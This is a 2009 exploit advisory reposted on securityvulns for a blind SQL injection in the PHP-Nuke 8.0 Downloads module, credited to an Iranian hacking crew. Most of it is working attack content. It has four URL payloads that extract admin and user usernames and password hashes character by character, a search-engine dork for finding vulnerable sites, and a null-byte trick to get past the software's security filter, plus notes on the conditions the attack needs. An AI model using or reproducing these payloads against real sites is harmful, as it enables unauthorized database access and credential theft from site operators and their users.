securityvulns — SECURITYVULNS:DOC:21224
Jan 25, 2009 - 12:00 a.m.

PHP-Nuke 8.0 Downloads Blind SQL Injection


#####################################################################################

PHP-Nuke 8.0 Downloads Blind SQL Injection

#####################################################################################

#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : http://ircrash.com #
#My Official WebSite : http://r3dw0rm.ir #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################

#Download : http://phpnuke.org #

#Dork : inurl:modules.php?name=Downloads "PHP-Nuke" #

#####################################################################################

[Bug]

#Admin Username :
http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&[email protected]&&url=0%2F*%00*/'%20OR%20ascii(substring((select+aid+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Admin Password :
http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&[email protected]&&url=0%2F*%00*/'%20OR%20ascii(substring((select+pwd+from+nuke_authors+limit+0,1),1,1))=ascii_code_try%2F*
#Users Username :
http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&[email protected]&&url=0%2F*%00*/'%20OR%20ascii(substring((select+username+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*
#Users Password :
http://[site]/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&[email protected]&&url=0%2F*%00*/'%20OR%20ascii(substring((select+user_password+from+nuke_users+limit+0,1),1,1))=ascii_code_try%2F*

#####################################################################################

[Note]

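#1. magic_quotes_gpc = Off (PHP setting on the target server) #
#2. register_globals = On (this PHP setting was removed in PHP 5.4, so the precondition can only hold on older PHP versions) #
#3. To use the bug you must be logged in as an ordinary (non-admin) user. #
#4. After using the bug, go to this URL: #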
#http://[site]/[path]/modules.php?name=Downloads&d_op=Add&[email protected]&title=zz&url=zz&description=zz
#5. I use ASCII codes and a null byte (%00) in the URL to bypass the PHP-Nuke security function, #

so please don't change the ASCII codes or the %00.

###################################### TNX GOD ######################################